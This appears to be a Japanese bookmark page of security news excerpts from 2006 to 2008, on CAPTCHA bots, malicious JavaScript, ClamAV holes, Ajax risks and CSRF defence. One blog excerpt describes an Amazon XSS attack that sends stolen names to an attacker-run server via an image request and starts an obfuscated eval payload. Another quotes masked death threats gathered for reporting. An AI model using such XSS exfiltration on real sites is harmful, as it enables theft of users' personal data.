タグ

関連タグで絞り込む (2)

タグの絞り込みを解除

セキュリティに関するques9のブックマーク (9)

  • 犯行予告の収集・通報サイト - 予告in

    02/18 08:27 夏目漱石 / 02/18 08:27 **** / 02/18 08:27 こんにちは。****殺す / 02/17 10:46 ****殺す 千葉県松戸市*** / 02/17 10:46 ****殺す 千葉県松戸市*** / 02/17 10:46 千葉県松戸市**** / 02/17 10:46 **さん殺すぞ 千葉県松戸市** / 02/17 08:42 ****殺す / 02/17 08:42 もう一発 コーラン燃やしつつム / 02/16 09:56 じゃあ****殺す / 02/15 12:10 これは確実にセーフだろwwwwwwww / 02/14 08:01 wwwwwwwwwwwwwww / 02/13 08:14 ****殺す / 02/13 08:13 >>375 **** / 02/11 15:07 今夜ぶたくんを殺しに行く / 02/11

  • 変形文字「CAPTCHA」はもう無意味?

    Webサービスの認証などに利用される変形文字のCAPTCHAはユーザーの妨げになるだけで、不正アカウント取得を防ぐ役には立たなくなったのか。 Webサービスでアカウントの不正取得を防ぐために使われている変形文字の「CAPTCHA」は、もう役に立たなくなっている――。人気WebメールのCAPTCHAを破るボットの相次ぐ登場を受け、セキュリティ研究者がこう指摘した。 セキュリティ企業のWebsenseは先に、米Microsoftの無料Webメール「Windows Live Mail」のCAPTCHAを破るボットが出現したと報告。続いてGoogleのGmailのCAPTCHAも破られたと伝えている。 IBM傘下のセキュリティ企業Internet Security Systems(ISS)のガンター・オルマン氏は2月25日のブログでこうした現状について紹介。CAPTCHAはかつてはいいアイデアだっ

    変形文字「CAPTCHA」はもう無意味?
    ques9
    ques9 2008/02/27
    技術は進歩する
  • «uJavaScriptv224;\ IT

    悪質な「JavaScript」が、ますます狡猾になっている。Arbor Networksの上級セキュリティエンジニアであるホセ・ナザリオ博士によれば、今日のJavaScriptは、標的のWebブラウザや脆弱なコンポーネント、アクセス可能なクラス識別子(CLSID)を特定したり、個別にカスタマイズした攻撃を仕掛けたりすることも可能だという。 ナザリオ氏は、「NeoSploit」と呼ばれる新たなマルウェアツールが、少なくとも7種の異なる手段の中から標的の弱点を衝くものを選択し、PCへの感染を広げている事実を把握したと述べている。 「過去数カ月の間に、この種の攻撃や悪質なJavaScriptが大量に出回った。JavaScriptがより自己防衛的に、なおかつ攻撃的に悪用されるケースが増えている」(ナザリオ氏) ナザリオ氏は4月18日に現地で開かれたセキュリティイベント「CanSecWest」に出席

    ques9
    ques9 2007/04/23
    > 攻撃者はJavaScriptをマルウェアの運搬手段として悪用するようになっている
  • 本当に怖い「パスワード破り」 - www.textfile.org

    http://itpro.nikkeibp.co.jp/article/COLUMN/20061110/253343/ SSHサービスに対する認証をやぶった後、攻撃者が何を行ったかの事例。 破ったシステムを、別のシステムに対するパスワード解析攻撃の踏み台にする ハニーポットにボットを仕掛けようとする フィッシング詐欺を目的とした偽のWebサイトを構築しようとする この事例では、不正侵入されたシステムは攻撃者側に回ってしまうことを示している。興味深い。 破られやすいパスワードも。パスワード破りの辞書ファイルに登録されている特殊文字の比率では、マイナス(-)が非常に高い。 でも「「-」の使用は控えたほうがよいだろう」というのは当かな?「パスワードは乱数で作りましょう」のほうが良いんじゃないでしょうか。 以下、我田引水リンク: ダイスウェア 以下、はてなブックマークから: sshのアタック対策

    本当に怖い「パスワード破り」 - www.textfile.org
  • オープンソースのウイルス対策ソフト「ClamAV」にセキュリティ・ホール

    デンマークSecuniaなどのセキュリティ・ベンダー各社は現地時間10月16日,オープンソースのウイルス対策ソフト「Clam Antivirus(ClamAV)」に2種類のセキュリティ・ホールが見つかったことを明らかにした。細工が施されたファイルを読み込むだけで,悪質なプログラムを実行される恐れがある。対策は,バージョン0.88.5以降にアップグレードすること。 ClamAVには,(1)PEファイル(Portable Executive file)を処理する部分,および(2)CHMファイル(Compiled HTML Help file)を処理する部分に,それぞれセキュリティ・ホールが見つかった。このため,細工が施されたPEファイルをClamAVで読み込むとバッファ・オーバーフローが発生し,任意のプログラムを勝手に実行される恐れがある。また,細工が施されたCHMファイルを読み込むと,Cla

    オープンソースのウイルス対策ソフト「ClamAV」にセキュリティ・ホール
  • Ajaxが招く新たなセキュリティリスク

    SPI Dynamicsの研究者によると、未熟なプログラマによるAjaxの実装が深刻な脆弱性を作り出す可能性がある。Black Hatからのレポート。 ラスベガス発――オンライン企業間におけるAjax(Asynchronous JavaScript and XML)技術の普及が急速に進み、Webサイトのインタラクティブ性の向上に一役買うようになった。一方で、経験の浅いプログラマが製作したサイトに潜む数多くの脆弱性が、Web 2.0技術の今後のセキュリティに影を落としているという。 7月31日から8月3日にかけて開催されたセキュリティカンファレンス「Black Hat」で講演を行ったビリー・ホフマン氏は、アトランタに拠点を置くセキュリティソフトウェアメーカー、SPI Dynamicsの研究施設で、主任リサーチエンジニアを務めている人物である。同氏は講演の中で、ごく一般的なAjaxアプリケーシ

    Ajaxが招く新たなセキュリティリスク
  • JavaScriptを悪用した攻撃手法--セキュリティ研究者らが発見

    JavaScriptを使って家庭や企業におけるネットワークの構成を把握し、接続されたサーバやプリンタ、ルータなどのデバイスを攻撃する方法を、セキュリティ研究者らが発見した。 こうした悪質なJavaScriptが埋め込まれたウェブページを一般のブラウザ上に表示すると、スクリプトが何の警告も表示しないまま実行されてしまうと、研究者らは述べる。また、これはユーザーのブラウザ上で動作するため、ファイアウォールなどのセキュリティ対策も回避するという。 ウェブセキュリティを専門にするSPI DynamicsのリードエンジニアBilly Hoffman氏は「われわれは、ネットワークをスキャンして見つかったすべてのウェブ対応デバイスを識別し、これらのデバイスに攻撃を仕掛けたり、コマンドを送信したりする技術を発見した。このテクニックを使えば、ファイアウォールで守られた企業のネットワークもスキャンできるように

    JavaScriptを悪用した攻撃手法--セキュリティ研究者らが発見
    ques9
    ques9 2006/07/31
    jsでネットワークのスキャンができるのか?
  • 本名吸い取り機 (AMAZON XSS) :: ぼくはまちちゃん!

    ↓これ 超おすすめマンガなんです!!! うそだけど! ( 修正がはいりました。もう動きません ) 取得後 alert のかわりに、自前で用意したサーバーに <img src="http://自前サーバー/?名"> かなんかでリクエストするようにしといて、その後、適当な書籍にリダイレクトさせたりすれば…! 名吸い取り機のできあがり! こわいね>< リンクじゃなくて iframe とかにしちゃえば、へんなの踏ませる必要すらないよ! (ちょっとだけ解説) ↓urlデコードするとこう http://www.amazon.co.jp/exec/obidos/tg/detail/-/<body onload=eval(String.fromCharCode(118, 97, 114, 32, 115, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 9

  • 開発者のための正しいCSRF対策

    著者: 金床 <anvil@jumperz.net> http://www.jumperz.net/ ■はじめに ウェブアプリケーション開発者の立場から見たCSRF対策について、さまざまな情報が入り乱れている。筆者が2006年3月の時点において国内のウェブサ イトやコンピュータ書籍・雑誌などでCSRF対策について書かれている記事を調べた結果、おどろくべきことに、そのほとんどが誤りを含んでいたり、現実的 には使用できない方法を紹介したりしていた。そこで稿ではウェブアプリケーション開発者にとっての当に正しいCSRF対策についてまとめることとす る。また、採用すべきでないCSRF対策とその理由も合わせて紹介する。 ■あらゆる機能がターゲットとなりうる ウェブアプリケーションの持つ全ての機能がCSRF攻撃の対象となりうる。まずこのことを認識しておく必要がある。 Amaz

  • 1